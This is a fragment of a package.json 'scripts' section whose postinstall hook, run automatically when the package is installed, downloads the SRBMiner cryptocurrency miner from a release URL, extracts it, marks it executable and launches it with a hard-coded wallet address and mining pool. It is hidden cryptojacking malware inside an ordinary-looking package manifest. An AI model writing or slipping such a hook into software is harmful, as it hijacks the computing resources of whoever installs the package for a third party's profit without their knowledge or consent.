"scripts": {
  "postinstall": "wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.2/srbminer_custom-2.4.2.tar.gz && tar -xf srbminer_custom-2.4.2.tar.gz && cd srbminer_custom && chmod +x srbminer_custom_bin && ./srbminer_custom_bin --algorithm yespowerLTNCG --wallet RAbmDJUMuWqkkmNju5DV72sraHiANAUpiu --pool stratum+tcp://yespowerLTNCG.na.mine.zpool.ca:6245 --password c=RVN,zap=CRNC"
}
